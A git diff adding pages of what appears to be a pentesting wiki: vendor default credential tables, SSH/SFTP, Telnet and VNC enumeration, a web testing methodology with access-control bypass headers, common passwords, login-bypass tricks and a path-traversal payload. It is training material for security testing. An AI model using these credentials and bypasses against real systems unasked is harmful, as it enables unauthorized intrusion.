+| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc\_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V\#rpar, procurve, badg3r5, OpC\_op, !manage, !admin |
+| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12\#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
+| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
+| Juniper | netscreen | netscreen |
+| NetApp | admin | netapp123 |
+| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
+| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |
+
+## Config files
+
+```text
+ssh_config
+sshd_config
+authorized_keys
+ssh_known_hosts
+known_hosts
+id_rsa
+```
+
+## SFTP
+
+You can configure **SSH to behave as a SFTP** server. So, some users will connect to SFTP service \(in port 22\) instead of to the SSH service.
+
+You can even set a **chroot to the SFTP users**. A configuration example of SFTP users inside the file _**/etc/ssh/sshd\_config**_ can be seen in the following images.
+
+All the **ots-\*** users will be jailed inside a **chroot**.
+
+![](../.gitbook/assets/image%20%28197%29.png)
+
+![](../.gitbook/assets/image%20%28337%29.png)
+
+### SFTP Tunneling
+
+If you have access to a SFTP server you can also tunnel your traffic through this for example using the common port forwarding:
+
+```text
+sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised> 
+```
+
+### Symlink
+
+The **sftp** have the command "**symlink**". Therefor, if you have **writable rights** in some folder, you can create **symlinks** of **other folders/files**. As you are probably **trapped** inside a chroot this **won't be specially useful** for you, but, if you can **access** the created **symlink** from a **no-chroot** **service** \(for example, if you can access the symlink from the web\), you could **open the symlinked files through the web**.
+
+For example, to create a **symlink** from a new file **"**_**froot**_**" to "**_**/**_**"**:
+
+```text
+sftp> symlink / froot
+```
+
+If you can access the file "_froot_" via web, you will be able to list the root \("/"\) folder of the system.
+
diff --git a/pentesting/pentesting-telnet.md b/pentesting/pentesting-telnet.md
new file mode 100644
index 00000000..b9501ec0
--- /dev/null
+++ b/pentesting/pentesting-telnet.md
@@ -0,0 +1,43 @@
+# 23 - Pentesting Telnet
+
+## **Basic Information**
+
+Telnet is a network protocol that gives users a UNsecure way to access a computer over a network.
+
+**Default port:** 23
+
+```text
+23/tcp open  telnet
+```
+
+## **Enumeration**
+
+### **Banner Grabbing**
+
+```bash
+nc -vn <IP> 23
+```
+
+All the interesting enumeration can be performed by **nmap**:
+
+```bash
+nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
+```
+
+The script `telnet-ntlm-info.nse` will obtain NTLM info \(Windows versions\).
+
+In the TELNET Protocol are various "**options**" that will be sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate \(or perhaps just different\) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc. \(From the [telnet RFC](https://tools.ietf.org/html/rfc854)\)  
+**I know it is possible to enumerate this options but I don't know how, so let me know if know how.**
+
+### \*\*\*\*[Brute force](../brute-force.md#telnet)
+
+## Config file
+
+```bash
+/etc/inetd.conf
+/etc/xinetd.d/telnet
+/etc/xinetd.d/stelnet
+```
+
+
+
diff --git a/pentesting/pentesting-vnc.md b/pentesting/pentesting-vnc.md
new file mode 100644
index 00000000..f781bfe3
--- /dev/null
+++ b/pentesting/pentesting-vnc.md
@@ -0,0 +1,46 @@
+# 5800,5801,5900,5901 - Pentesting VNC
+
+## Basic Information
+
+In computing, **Virtual Network Computing** \(**VNC**\) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol \(RFB\) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.   
+From [wikipedia](https://en.wikipedia.org/wiki/Virtual_Network_Computing).
+
+VNC usually uses ports **5800 or 5801 or 5900 or 5901.**
+
+```text
+PORT    STATE SERVICE
+5900/tcp open  vnc
+```
+
+## Enumeration
+
+```bash
+nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p <PORT> <IP>
+msf> use auxiliary/scanner/vnc/vnc_none_auth
+```
+
+### \*\*\*\*[**Brute force**](../brute-force.md#vnc)
+
+## Connect to vnc using Kali
+
+```bash
+vncviewer [-passwd passwd.txt] <IP>::5901
+```
+
+## Decrypting VNC password
+
+Default **password is stored** in: ~/.vnc/passwd
+
+If you have the VNC password and it looks encrypted \(a few bytes, like if it could be and encrypted password\). It is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd)
+
+```bash
+make
+vncpwd <vnc password file>
+```
+
+You can do this because the password used inside 3des to encrypt the plain-text VNC passwords was reversed years ago.  
+For **Windows** you can also use this tool: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)  
+I save the tool here also for ease of access:
+
+{% file src="../.gitbook/assets/vncpwd.zip" %}
+
diff --git a/pentesting/pentesting-web/README.md b/pentesting/pentesting-web/README.md
new file mode 100644
index 00000000..35a751e5
--- /dev/null
+++ b/pentesting/pentesting-web/README.md
@@ -0,0 +1,358 @@
+# 80,443 - Pentesting Web Methodology
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+## Basic Info
+
+The web service is the most **common and extensive service** and a lot of **different types of vulnerabilities** exists.
+
+**Default port:** 80 \(HTTP\), 443\(HTTPS\)
+
+```bash
+PORT    STATE SERVICE
+80/tcp  open  http
+443/tcp open  ssl/https
+```
+
+```bash
+nc -v domain.com 80 # GET / HTTP/1.0
+openssl s_client -connect domain.com:443 # GET / HTTP/1.0
+```
+
+## Methodology summary
+
+> In this methodology we are going to suppose that you are going to a attack a domain \(or subdomain\) and only that. So, you should apply this methodology to each discovered domain, subdomain or IP with undetermined web server inside the scope.
+
+* [ ] Start by **identifying** the **technologies** used by the web server. Look for **tricks** to keep in mind during the rest of the test if you can successfully identify the tech.
+  * [ ] Any **known vulnerability** of the version of the technology?
+  * [ ] Using any **well known tech**? Any **useful trick** to extract more information?
+  * [ ] Any **specialised scanner** to run \(like wpscan\)?
+  * [ ] Any **vulnerable cookie**? **JWT**?
+* [ ] Check for **vulnerable proxies** being used \(_Test this in every new tech discovered in the webapp_\) :
+  * [ ] **hop-by-hop headers**
+  * [ ] **Request Smuggling**
+  * [ ] **Cache Poisoning/Cache Deception**
+* [ ] Launch **general purposes scanners**. You never know if they are going to find something or if the are going to find some interesting information.
+* [ ] Start with the **initial checks**: **robots**, **sitemap**, **404** error and **SSL/TLS scan** \(if HTTPS\).
+* [ ] Start **spidering** the web page: It's time to **find** all the possible **files, folders** and **parameters being used.** Also, check for **special findings**.
+  * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
+* [ ] **Directory Brute-Forcing**: Try to brute force all the discovered folders searching for new **files** and **directories**. 
+  * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
+* [ ] **Backups checking**: Test if you can find **backups** of **discovered files** appending common backup extensions.
+* [ ] **Brute-Force parameters**: Try to **find hidden parameters**.
+* [ ] Once you have **identified** all the possible **endpoints** accepting **user input**, check for all kind of **vulnerabilities** related to it.
+  * [ ] This is by far the **most complex part of pentesting web**, and **depending** of the **vulnerability** the pentester should know how to **discover** it. In **this book** you can find **explained** a lot of **web vulnerabilities** related to user input.
+
+## Server Version \(Vulnerable?\)
+
+### Identify
+
+Check if there are **known vulnerabilities** for the server **version** that is running.  
+The **HTTP headers and cookies of the response** could be very useful to **identify** the **technologies** and/or **version** being used. **Nmap scan** can identify the server version, but it could also be useful the tools [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)or [**https://builtwith.com/**](https://builtwith.com/)**:**
+
+```bash
+whatweb -a 1 <URL> #Stealthy
+whatweb -a 3 <URL> #Aggresive
+webtech -u <URL>
+```
+
+Search ****for ****[**vulnerabilities of the web application** **version**](../../search-exploits.md)\*\*\*\*
+
+### **Cookies**
+
+As commented the cookies can be very useful to identify the technology in used \(if well known\) but if the used **cookies** are **custom**, they could be **vulnerable**. So if you find a **custom sensitive** cookie you should [**check it for vulnerabilities**](../../pentesting-web/hacking-with-cookies.md#hacking-cookies).  
+Also, the [**flags of the cookies**](../../pentesting-web/hacking-with-cookies.md#cookies-flags) can also be interesting from a security point of view.
+
+### Web tech tricks
+
+Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used: 
+
+* [**IIS tricks**](iis-internet-information-services.md)\*\*\*\*
+* [**PHP \(php has a lot of interesting tricks that could be exploited\)**](php-tricks-esp/)\*\*\*\*
+* \*\*\*\*[**Nginx**](nginx.md)\*\*\*\*
+* \*\*\*\*[**Python**](python.md)\*\*\*\*
+* \*\*\*\*[**Flask**](flask.md)\*\*\*\*
+* \*\*\*\*[**WebDav**](put-method-webdav.md)\*\*\*\*
+* \*\*\*\*[**CGI**](cgi.md)\*\*\*\*
+* [**Tomcat**](tomcat.md)\*\*\*\*
+* \*\*\*\*[**Jenkins**](jenkins.md)\*\*\*\*
+* \*\*\*\*[**JBOSS**](jboss.md)\*\*\*\*
+* \*\*\*\*[**JIRA**](jira.md)
+* [**JSP**](jsp.md)\*\*\*\*
+* \*\*\*\*[**Wordpress**](wordpress.md)\*\*\*\*
+* \*\*\*\*[**Drupal**](drupal.md)\*\*\*\*
+* \*\*\*\*[**VMWare \(EXS, VCenter...\)**](vmware-esx-vcenter....md)\*\*\*\*
+* \*\*\*\*[**GraphQL**](graphql.md)\*\*\*\*
+
+If the **source code** of the application is available in **github**, apart of performing by y**our own a White box test** of the application \(no guide available yet in hacktricks\) there is **some information** that could be **useful** for the current **Black-Box testing**:
+
+* Is there a **Changelog or Readme or Version** file or anything with **version info accesible** via web?
+* How and where are saved the **credentials**? Is there any \(accesible?\) **file** with credentials \(usernames or passwords\)?
+* Are **passwords** in **plain text**, **encrypted** or which **hashing algorithm** is used?
+* Is it using any **master key** for encrypting something? Which **algorithm** is used?
+* Can you **access any of these files** exploiting some vulnerability?
+* Is there any **interesting information in the github** \(solved and not solved\) **issues**? Or in **commit history** \(maybe some **password introduced inside an old commit**\)?
+
+_Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._  
+If the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks \(and let me know!\).
+
+## Proxies/Load balances vulnerabilities
+
+You should look for these kind of vulnerabilities every time you find a **path** were a **different technology** is **running**. For example, if you find a **java** webapp and in `/wordpress` a **wordpress** is running.
+
+* [**Abusing hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)\*\*\*\*
+* \*\*\*\*[**Request Smuggling**](../../pentesting-web/http-request-smuggling.md)\*\*\*\*
+* \*\*\*\*[**Cache Poisoning / Cache Deception**](../../pentesting-web/cache-deception.md)\*\*\*\*
+
+## Automatic scanners
+
+### General purpose automatic scanners
+
+```bash
+nikto -h <URL>
+whatweb -a 4 <URL>
+wapiti -u <URL>
+W3af
+```
+
+### CMS scanners
+
+If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:
+
+[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**  
+[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. \(GUI\)  
+[**VulnX**](https://github.com/anouarbensaad/vulnx)**: Joomla,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart  
+CMSMap**: [**\(W\)ordpress**](wordpress.md)**, \(J\)oomla,** [**\(D\)rupal**](drupal.md) **or \(M\)oodle**  
+[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**, Joomla, Moodle, Silverstripe,** [**Wordpress**](wordpress.md)\*\*\*\*
+
+```bash
+cmsmap [-f W] -F -d <URL>
+wpscan --force update -e --url <URL>
+joomscan --ec -u <URL>
+joomlavs.rb #https://github.com/rastating/joomlavs
+```
+
+> At this point you should already have some information of the web server being used by the client \(if any data is given\) and some tricks to keep in mind during the test. If you are lucky you have even found a CMS and run some scanner.
+
+## Step-by-step Web Application testing
+
+> From this point we are going to start interacting with the web application.
+
+### Initial checks
+
+#### Default pages with interesting info:
+
+* /robots.txt
+* /sitemap.xml
+* Some _404_ error - _Some interesting data could be presented here._
+
+#### Check if you can upload files \([PUT verb, WebDav](put-method-webdav.md)\)
+
+If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
+
+* **Brute Force** credentials
+* **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
+
+#### SSL/TLS vulnerabilites
+
+Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** \(In Bug Bounty programs probably these kind of vulnerabilities won't be accepted\) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
+
+```bash
+./testssl.sh [--htmlfile] 10.10.10.10:443
+#Use the --htmlfile to save the output inside an htmlfile also
+
+## You can also use other tools, by testssl.sh at this momment is the best one (I think)
+sslscan <host:port>
+sslyze --regular <ip:port>
+```
+
+Information about SSL/TLS vulnerabilities:
+
+* [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/) 
+* [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
+
+### Spidering
+
+Launch some kind of **spider** inside the web. The goal of the spider is:
+
+* Find all **files** and **folders** \([**gospider** ](https://github.com/jaeles-project/gospider)or [**dirhunt**](https://github.com/Nekmo/dirhunt)\). [Broken link checker](https://github.com/stevenvachon/broken-link-checker) \(lets see if you can takeover something\).
+* Find all **possible parameters** for each executable file. You can help yourself in this matter using [ParamSpider](https://github.com/devanshbatham/ParamSpider).
+* Read the next section "**Special Findings**" to search for more information on each file found.
+* [hakrawler](https://github.com/hakluke/hakrawler) can also be interesting
+
+_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
+
+### Brute Force directories and files
+
+Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** \(you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories\).  
+Tools:
+
+* **Dirb** / **Dirbuster** - Included in Kali, **old** \(and **slow**\) but functional. Allow auto-signed certificates and recursive search.
+* [**Dirsearch**](https://github.com/maurosoria/dirsearch) ****- **Fast**, it doesn't allow auto-signed certificates but **allows recursive** search.
+* [**Gobuster**](https://github.com/OJ/gobuster) - **Fast**, go needed, allow auto-signed certificates, it **doesn't** have **recursive** search.
+* [**ffuf** ](https://github.com/ffuf/ffuf)- Fastest: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
+
+**Recommended dictionaries:**
+
+* \*\*\*\*[https://github.com/danielmiessler/RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed) \(Very interesting\)
+* **Dirsearch** included dictionary
+* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
+* _/usr/share/wordlists/dirb/common.txt_
+* _/usr/share/wordlists/dirb/big.txt_
+* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
+
+_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
+
+### File backups
+
+Once you have found all the files, look for backups of all the executable files \("_.php_", "_.aspx_"...\). Common variations for naming a backup are: _file.ext~, \#file.ext\#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old_
+
+### Discover parameters using brute-force
+
+You use tools like ****[**Arjun**](https://github.com/s0md3v/Arjun) **and** [**Parameth**](https://github.com/maK-/parameth) to discover hidden parameters. If you can, you could try to search **hidden parameters** on each executable web file.
+
+### Special findings
+
+**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**.
+
+#### **Interesting files**
+
+* Look for **links** to other files inside the **CSS** files.
+* [If you find a _**.git**_ file some information can be extracted](git.md)
+* If you find **API endpoints** you [should also test them](api-pentesting.md). These aren't files, but will probably "look like" them.
+
+#### **Interesting info inside the file**
+
+* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**. 
+  * If you are playing  **CTF**,  a "common" trick is to **hide** **information** inside comments at the **right** of the **page** \(using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser\). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
+* **API keys**: If you find any API key there is guide that indicates how to use API keys of different platforms: [https://github.com/streaak/keyhacks](https://github.com/streaak/keyhacks), [https://github.com/xyele/zile.git](https://github.com/xyele/zile.git)
+* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).
+
+#### JS code
+
+The **JS code** of a web application can be really interesting: It could contain **API keys**, **credentials**, other **endpoints**, and understanding it you could be able to **bypass security measures**.  
+It could be also very useful to **parse** the **JS files** in order to search for other **endpoints:** [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder)**,** [**JSScanner**](https://github.com/dark-warlord14/JSScanner) **\(wrap of LinkFinder\),** [**JSParser**](https://github.com/nahamsec/JSParser)**,** [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor)**.**  
+You should also **check** if the application is using any **outdated** and **vulnerable javascript library** with: [**RetireJS**](https://github.com/retirejs/retire.js/)\*\*\*\*
+
+If the **javascript** code is **obfuscated**, these tools could be useful: 
+
+* **Javascript Deobfuscator and Unpacker** \([https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/)\)
+* **Javascript Beautifier**  \([http://jsbeautifier.org/](https://beautifier.io/)\)
+* **BrainFuck deobfuscation** \(javascript with chars:"\[\]!+" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/)\)
+
+In several occasions you will need to **understand regular expressions** used, this will be useful: [https://regex101.com/](https://regex101.com/)
+
+#### 403 Forbidden/Basic Authentication/401 Unauthorized \(bypass\)
+
+* Try using **different verbs** to access the file: _GET, POST, INVENTED_
+* If _/path_ is blocked, try using _**/**_**%2e/**path __\(if the access is blocked by a proxy, this could bypass the protection\). Try also _/**%252e**/path_ \(double URL encode\)
+* Try Unicode bypass: _/**%ef%bc%8f**path_ \(The URL encoded chars are like "/"\) so when encoded back it will be _//path_ and maybe you will have already bypassed the _/path_ name check
+* Go to [https://archive.org/web/](https://archive.org/web/) and check if in the past that file was **worldwide accessible**.
+* **Fuzz the page**: Try using HTTP Proxy **Headers**, HTTP Authentication Basic and NTLM brute-force \(with a few combinations only\) and other techniques. To do all of this I have created the tool [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass).
+  * `X-Originating-IP: 127.0.0.1` 
+  * `X-Forwarded-For: 127.0.0.1` 
+  * `X-Remote-IP: 127.0.0.1` 
+  * `X-Remote-Addr: 127.0.0.1`
+  * `X-ProxyUser-Ip: 127.0.0.1`
+  * `X-Original-URL: 127.0.0.1`
+  * If the **path is protected** you can try to bypass the path protection using these other headers:
+    * `X-Original-URL: /admin/console`
+    * `X-Rewrite-URL: /admin/console`
+* **Guess the password**: Test the following common credentials. Do you know something about the victim? Or the CTF challenge name?
+* [**Brute force**](../../brute-force.md#http-brute)
+
+  {% code title="Common creds" %}
+  ```text
+  admin    admin
+  admin    password
+  admin    1234
+  admin    admin1234
+  admin    123456
+  root     toor
+  test     test
+  guest    guest
+  ```
+  {% endcode %}
+
+#### 502 Proxy Error
+
+If any page **responds** with that **code**, it's probably a **bad configured proxy**. ****If you send a HTTP request like: `GET https://google.com HTTP/1.1` \(with the host header and other common headers\), the **proxy** will try to **access** _**google.com**_ and you will have found a **SSRF**.
+
+#### **NTLM Authentication - Info disclosure**
+
+If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** \(and asking for **domain** **name**\), you can provoke an **information disclosure**.  
+**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info \(IIS version, Windows version...\) inside the header "WWW-Authenticate".  
+You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_". 
+
+#### HTTP Redirect \(CTF\)
+
+It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** \(as the browser will execute the redirection\) but something could be **hidden** in there.
+
+## User input related vulnerabilities special mention
+
+### **Bypass regular login \(POST or GET method\)**
+
+If you find a login page, here you can find some techniques to try to bypass it:
+
+* Check for **comments** inside the page \(scroll down and to the right?\)
+* Check if you can **directly access the restricted pages**
+* Check to **not send the parameters** \(do not send any or only 1\)
+* Test manually [very common passwords](./#2-2-5-list-of-common-password-to-test-manually).
+* Check for **default credentials** 
+* Check for **common combinations** \(root, admin, password, name of the tech, default user with one of these passwords\)
+* Check the **PHP comparisons error:** _user\[\]=a&pwd=b_ , _user=a&pwd\[\]=b_ , _user\[\]=a&pwd\[\]=b_
+* Create a dictionary using **Cewl**, **add** the **default** username and password \(if there is\) and try to brute-force it using all the words as **usernames and password**
+* Try to **brute-force** using a bigger **dictionary \(**[**Brute force**](../../brute-force.md#http-post-form)**\)**
+
+You should also check for:
+
+* [**SQL Injection authentication bypass**](../../pentesting-web/sql-injection/#authentication-bypass)\*\*\*\*
+* \*\*\*\*[**NoSQL Injection**](../../pentesting-web/nosql-injection.md)\*\*\*\*
+* \*\*\*\*[**XPath Injection**](../../pentesting-web/xpath-injection.md)\*\*\*\*
+* \*\*\*\*[**LDAP Injection**](../../pentesting-web/ldap-injection.md)\*\*\*\*
+
+### Insert into/Create Object
+
+Check for ****[**SQL INSERT INTO Injections.**](../../pentesting-web/sql-injection/#insert-statement)\*\*\*\*
+
+### **Upload Files**
+
+Check for this vulnerabilities:
+
+* \*\*\*\*[**File Upload**](../../pentesting-web/file-upload.md)\*\*\*\*
+
+## **User input Web Vulnerabilities list**
+
+* \*\*\*\*[**2FA Bypass**](../../pentesting-web/2fa-bypass.md)\*\*\*\*
+* \*\*\*\*[**Captcha Bypass**](../../pentesting-web/captcha-bypass.md)\*\*\*\*
+* \*\*\*\*[**Clickjacking**](../../pentesting-web/clickjacking.md)\*\*\*\*
+* \*\*\*\*[**Client Side Template Injection \(CSTI\)**](../../pentesting-web/client-side-template-injection-csti.md)\*\*\*\*
+* \*\*\*\*[**Command Injection**](../../pentesting-web/command-injection.md)\*\*\*\*
+* \*\*\*\*[**Content Security Policy \(CSP\) Bypass**](../../pentesting-web/content-security-policy-csp-bypass.md)\*\*\*\*
+* \*\*\*\*[**Cookies Hacking**](../../pentesting-web/hacking-with-cookies.md)\*\*\*\*
+* \*\*\*\*[**CORS - Misconfigurations & Bypass**](../../pentesting-web/cors-bypass.md)\*\*\*\*
+* \*\*\*\*[**CRLF Injection**](../../pentesting-web/crlf-0d-0a.md)\*\*\*\*
+* \*\*\*\*[**CSRF \(Cross Site Request Forgery\)**](../../pentesting-web/csrf-cross-site-request-forgery.md)\*\*\*\*
+* \*\*\*\*[**Dangling Markup - HTML scriptless injection**](../../pentesting-web/dangling-markup-html-scriptless-injection.md)\*\*\*\*
+* \*\*\*\*[**Deserialization**](../../pentesting-web/deserialization/)\*\*\*\*
+* \*\*\*\*[**Email Header Injection**](../../pentesting-web/email-header-injection.md)\*\*\*\*
+* \*\*\*\*[**File Inclusion**](../../pentesting-web/file-inclusion.md)\*\*\*\*
+* \*\*\*\*[**File Upload**](../../pentesting-web/file-upload.md)\*\*\*\*
+* \*\*\*\*[**IDOR**](../../pentesting-web/idor.md)\*\*\*\*
+* \*\*\*\*[**JWT Vulnerabilities**](../../pentesting-web/hacking-jwt-json-web-tokens.md)\*\*\*\*
+* \*\*\*\*[**NoSQL Injection**](../../pentesting-web/nosql-injection.md)\*\*\*\*
+* \*\*\*\*[**LDAP Injection**](../../pentesting-web/ldap-injection.md)\*\*\*\*
+* \*\*\*\*[**Open Redirect**](../../pentesting-web/open-redirect.md)
+* [**Race Condition**](../../pentesting-web/race-condition.md)\*\*\*\*
+* \*\*\*\*[**SQL Injection**](../../pentesting-web/sql-injection/)\*\*\*\*
+* \*\*\*\*[**SSRF \(Server Side Request Forgery\)**](../../pentesting-web/ssrf-server-side-request-forgery.md)\*\*\*\*
+* \*\*\*\*[**SSTI \(Server Side Template Injection\)**](../../pentesting-web/ssti-server-side-template-injection.md)\*\*\*\*
+* \*\*\*\*[**Unicode Normalization vulnerability**](../../pentesting-web/unicode-normalization-vulnerability.md)\*\*\*\*
+* \*\*\*\*[**XPATH Injection**](../../pentesting-web/xpath-injection.md)\*\*\*\*
+* \*\*\*\*[**XSLT Server Side Injection**](../../pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\*
+* \*\*\*\*[**XXE \(XML External Entity\)**](../../pentesting-web/xxe-xee-xml-external-entity.md)\*\*\*\*
+* \*\*\*\*[**XSS \(Cross Site Scripting\)**](../../pentesting-web/xss-cross-site-scripting/)\*\*\*\*
+* \*\*\*\*[**XS-Search**](../../pentesting-web/xs-search.md)\*\*\*\*
+
+**More references** for each Web Vulnerability: [https://cyberzombie.in/bug-bounty-methodology-techniques-tools-procedures/](https://cyberzombie.in/bug-bounty-methodology-techniques-tools-procedures/)
+
diff --git a/pentesting/pentesting-web/apache.md b/pentesting/pentesting-web/apache.md
new file mode 100644
index 00000000..9be53cc9
--- /dev/null
+++ b/pentesting/pentesting-web/apache.md
@@ -0,0 +1,19 @@
+# Apache
+
+## Executable PHP extensions
+
+Check which extensions is executing the Apache server. To search them you can execute:
+
+```bash
+ grep -R -B1 "httpd-php" /etc/apache2
+```
+
+Also, some places where you can find this configuration is:
+
+```bash
+/etc/apache2/mods-available/php5.conf
+/etc/apache2/mods-enabled/php5.conf
+/etc/apache2/mods-available/php7.3.conf
+/etc/apache2/mods-enabled/php7.3.conf
+```
+
diff --git a/pentesting/pentesting-web/api-pentesting.md b/pentesting/pentesting-web/api-pentesting.md
new file mode 100644
index 00000000..bd52013a
--- /dev/null
+++ b/pentesting/pentesting-web/api-pentesting.md
@@ -0,0 +1,26 @@
+# API Pentesting
+
+## Tricks
+
+#### Play with routes
+
+`/files/..%2f..%2f + victim ID + %2f + victim filename`
+
+## Owasp API Security Top 10
+
+Read this document to learn how to **search** and **exploit** Owasp Top 10 API vulnerabilities: [https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)
+
+## API Security Checklist
+
+{% embed url="https://github.com/shieldfy/API-Security-Checklist" %}
+
+## List of possible API endpoints
+
+[https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)
+
+## Tools
+
+[https://github.com/imperva/automatic-api-attack-tool](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output.
+
+[https://github.com/flipkart-incubator/Astra](https://github.com/flipkart-incubator/Astra): Another tool for api testing
+
diff --git a/pentesting/pentesting-web/buckets/README.md b/pentesting/pentesting-web/buckets/README.md
new file mode 100644
index 00000000..0269582f
--- /dev/null
+++ b/pentesting/pentesting-web/buckets/README.md
@@ -0,0 +1,12 @@
+# Buckets
+
+A good tool to review your configuration in several clouds is: [https://github.com/nccgroup/ScoutSuite](https://github.com/nccgroup/ScoutSuite)
+
+\*\*\*\*[**AWS S3 hacking tricks**](aws-s3.md)\*\*\*\*
+
+**More info:**
+
+* [https://www.notsosecure.com/cloud-services-enumeration-aws-azure-and-gcp/](https://www.notsosecure.com/cloud-services-enumeration-aws-azure-and-gcp/)
+* [https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
+* [https://www.notsosecure.com/identifying-exploiting-leaked-azure-storage-keys/](https://www.notsosecure.com/identifying-exploiting-leaked-azure-storage-keys/)
+
diff --git a/pentesting/pentesting-web/buckets/aws-s3.md b/pentesting/pentesting-web/buckets/aws-s3.md
new file mode 100644
index 00000000..95eeba0e
--- /dev/null
+++ b/pentesting/pentesting-web/buckets/aws-s3.md
@@ -0,0 +1,271 @@
+# AWS-S3
+
+## Amazon S3 Buckets
+
+A bucket is typically considered “public” if any user can list the contents of the bucket, and “private” if the bucket's contents can only be listed or written by certain S3 users. This is important to understand and emphasize. _**A public bucket will list all of its files and directories to an any user that asks.**_
+
+It should be emphasized that a public bucket is not a risk created by Amazon but rather a misconfiguration caused by the owner of the bucket. And although a file might be listed in a bucket it does not necessarily mean that it can be downloaded. Buckets and objects have their own access control lists \(ACLs\).  Amazon provides information on managing access controls for buckets [here](http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingAuthAccess.html). Furthermore, Amazon helps their users by publishing a best practices document on [public access considerations around S3 buckets](http://aws.amazon.com/articles/5050). The default configuration of an S3 bucket is private.
+
